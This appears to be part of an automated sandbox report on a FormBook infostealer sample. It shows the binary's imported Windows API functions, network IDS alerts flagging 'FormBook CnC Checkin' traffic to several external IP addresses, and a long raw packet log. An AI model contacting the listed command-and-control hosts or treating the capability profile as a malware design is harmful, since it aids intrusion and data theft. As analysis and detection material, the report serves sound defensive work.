GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, GetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, MessageBoxW, DefWindowProcW, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, GetMenuItemID, DispatchMessageW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, PeekMessageW, UnregisterHotKey, CharLowerBuffW, keybd_event, MonitorFromRect, GetWindowThreadProcessId
                                                      GDI32.dllDeleteObject, AngleArc, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, GetDeviceCaps, MoveToEx, DeleteDC, GetPixel, CreateDCW, Ellipse, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, LineTo
                                                      COMDLG32.dllGetSaveFileNameW, GetOpenFileNameW
                                                      ADVAPI32.dllRegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegConnectRegistryW, CloseServiceHandle, UnlockServiceDatabase, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, InitializeSecurityDescriptor, InitializeAcl, GetLengthSid, CopySid, LogonUserW, LockServiceDatabase, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, GetAce, AddAce, SetSecurityDescriptorDacl, RegOpenKeyExW, RegQueryValueExW, AdjustTokenPrivileges, InitiateSystemShutdownExW, OpenSCManagerW, RegCloseKey
                                                      SHELL32.dllDragQueryPoint, ShellExecuteExW, SHGetFolderPathW, DragQueryFileW, SHEmptyRecycleBinW, SHBrowseForFolderW, SHFileOperationW, SHGetPathFromIDListW, SHGetDesktopFolder, SHGetMalloc, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                                      ole32.dllOleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CLSIDFromString, StringFromGUID2, CoInitialize, CoUninitialize, CoCreateInstance, CreateStreamOnHGlobal, CoTaskMemAlloc, CoTaskMemFree, ProgIDFromCLSID, OleInitialize, CreateBindCtx, CLSIDFromProgID, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket, OleUninitialize, IIDFromString
                                                      OLEAUT32.dllVariantChangeType, VariantCopyInd, DispCallFunc, CreateStdDispatch, CreateDispTypeInfo, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SysStringLen, SafeArrayAllocData, GetActiveObject, QueryPathOfRegTypeLib, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysAllocString, VariantCopy, VariantClear, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, OleLoadPicture, SafeArrayAccessData, VariantInit
                                                      Language of compilation systemCountry where language is spokenMap
                                                      EnglishGreat Britain
                                                      EnglishUnited States

                                                      Download Network PCAP: filteredfull

                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                      2024-09-19T15:04:08.561475+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.224916154.179.173.6080TCP
                                                      2024-09-19T15:04:32.628068+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.2249166206.119.82.14780TCP
                                                      2024-09-19T15:04:45.984393+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.224917081.88.63.4680TCP
                                                      2024-09-19T15:04:59.431051+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.224917467.223.117.18980TCP
                                                      2024-09-19T15:05:13.658801+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.224917885.159.66.9380TCP
                                                      2024-09-19T15:05:27.528121+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.2249182208.91.197.2780TCP
                                                      2024-09-19T15:06:15.122140+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.2249186194.58.112.17480TCP
                                                      2024-09-19T15:06:29.007375+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.2249190103.21.221.480TCP
                                                      2024-09-19T15:06:42.251288+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.224919484.32.84.3280TCP
                                                      2024-09-19T15:06:55.880336+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.2249198194.58.112.17480TCP
                                                      2024-09-19T15:07:09.375042+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.224920265.21.196.9080TCP
                                                      2024-09-19T15:07:22.662612+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.2249206172.81.61.22480TCP
                                                      • Total Packets: 729
                                                      • 80 (HTTP)
                                                      • 53 (DNS)
                                                      TimestampSource PortDest PortSource IPDest IP
                                                      Sep 19, 2024 15:04:07.614294052 CEST4916180192.168.2.2254.179.173.60
                                                      Sep 19, 2024 15:04:07.621124029 CEST804916154.179.173.60192.168.2.22
                                                      Sep 19, 2024 15:04:07.621195078 CEST4916180192.168.2.2254.179.173.60
                                                      Sep 19, 2024 15:04:07.635279894 CEST4916180192.168.2.2254.179.173.60
                                                      Sep 19, 2024 15:04:07.641480923 CEST804916154.179.173.60192.168.2.22
                                                      Sep 19, 2024 15:04:08.561336994 CEST804916154.179.173.60192.168.2.22
                                                      Sep 19, 2024 15:04:08.561373949 CEST804916154.179.173.60192.168.2.22
                                                      Sep 19, 2024 15:04:08.561475039 CEST4916180192.168.2.2254.179.173.60
                                                      Sep 19, 2024 15:04:08.564651012 CEST4916180192.168.2.2254.179.173.60
                                                      Sep 19, 2024 15:04:08.569468021 CEST804916154.179.173.60192.168.2.22
                                                      Sep 19, 2024 15:04:13.218329906 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:13.223220110 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:13.223300934 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:13.223486900 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:13.228564024 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:13.755781889 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:13.755816936 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:13.755829096 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:13.755841017 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:13.755850077 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:13.755860090 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:13.755871058 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:13.755881071 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:13.755898952 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:13.755938053 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:13.755938053 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:13.755938053 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:13.756000996 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:13.756046057 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:13.756062984 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:13.756100893 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:13.762983084 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:13.762999058 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:13.763036013 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:13.796703100 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:13.842602015 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:13.842694044 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:13.842727900 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:13.842761040 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:13.842793941 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:13.842827082 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:13.842827082 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:13.842827082 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:13.842827082 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:13.842827082 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:13.842983007 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:13.843031883 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:13.843035936 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:13.843071938 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:13.843086958 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:13.843118906 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:13.843153000 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:13.843187094 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:13.843200922 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:13.843234062 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:13.844243050 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:13.844294071 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:13.844295025 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:13.844327927 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:13.844343901 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:13.844361067 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:13.844372988 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:13.844394922 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:13.844408035 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:13.844440937 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:13.844702005 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:13.844739914 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:13.844773054 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:13.844773054 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:13.844784975 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:13.844813108 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:13.844863892 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:13.844897032 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:13.844916105 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:13.844938040 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:13.845777035 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:13.845827103 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:13.846007109 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:13.846056938 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:13.847826004 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:13.847882986 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:13.931027889 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:13.931045055 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:13.931056023 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:13.931159019 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:13.931288958 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:13.931299925 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:13.931312084 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:13.931341887 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:13.931341887 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:13.931377888 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:13.931401968 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:13.931412935 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:13.931420088 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:13.931426048 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:13.931432962 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:13.931473970 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:13.931473970 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:13.931494951 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:13.931508064 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:13.931518078 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:13.931529045 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:13.931538105 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:13.931548119 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:13.931562901 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:13.932063103 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:13.932073116 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:13.932084084 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:13.932115078 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:13.932127953 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:13.932154894 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:13.932193995 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:13.932199001 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:13.932255983 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:13.932292938 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:13.932307005 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:13.932317019 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:13.932327986 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:13.932339907 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:13.932341099 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:13.932348967 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:13.932353020 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:13.932368994 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:13.932413101 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:13.932941914 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:13.932991028 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:13.933062077 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:13.933078051 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:13.933089972 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:13.933099985 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:13.933108091 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:13.933111906 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:13.933121920 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:13.933132887 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:13.933165073 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:13.933370113 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:13.933382034 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:13.933393002 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:13.933403015 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:13.933413982 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:13.933415890 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:13.933429956 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:13.933439970 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:13.934319019 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:13.934335947 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:13.934346914 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:13.934356928 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:13.934365034 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:13.934367895 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:13.934374094 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:13.934381008 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:13.934391975 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:13.934392929 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:13.934398890 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:13.934405088 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:13.934417963 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:13.934418917 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:13.934442997 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:13.934451103 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.019682884 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.019752026 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.019788027 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.019793034 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.019869089 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.019869089 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.019869089 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.019928932 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.019928932 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.019968033 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.019969940 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.020004034 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.020016909 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.020045042 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.020060062 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.020093918 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.020109892 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.020134926 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.020143032 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.020179033 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.020191908 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.020212889 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.020231009 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.020246029 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.020248890 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.020282030 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.020292997 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.020315886 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.020322084 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.020349026 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.020370007 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.020379066 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.020381927 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.020426035 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.020586967 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.020636082 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.020714045 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.020742893 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.020759106 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.020772934 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.020792007 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.020823956 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.020840883 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.020859957 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.020863056 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.020910025 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.020912886 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.020944118 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.020957947 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.020979881 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.020993948 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.021018028 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.021025896 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.021054983 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.021065950 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.021087885 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.021100998 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.021121025 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.021128893 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.021153927 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.021168947 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.021188021 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.021193981 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.021238089 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.021842003 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.021893024 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.021897078 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.021945000 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.021949053 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.021981955 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.021998882 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.022016048 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.022021055 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.022063017 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.022066116 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.022109985 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.022113085 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.022145033 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.022165060 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.022173882 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.022176981 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.022212029 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.022224903 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.022245884 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.022258043 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.022279024 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.022293091 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.022313118 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.022322893 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.022362947 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.022655010 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.022687912 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.022705078 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.022718906 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.022720098 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.022772074 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.022828102 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.022860050 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.022876024 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.022892952 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.022901058 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.022928953 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.022937059 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.022963047 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.022972107 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.022996902 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.023000956 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.023030043 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.023036957 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.023062944 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.023077011 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.023096085 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.023112059 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.023142099 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.025609016 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.025662899 CEST4916280192.168.2.2245.33.6.223
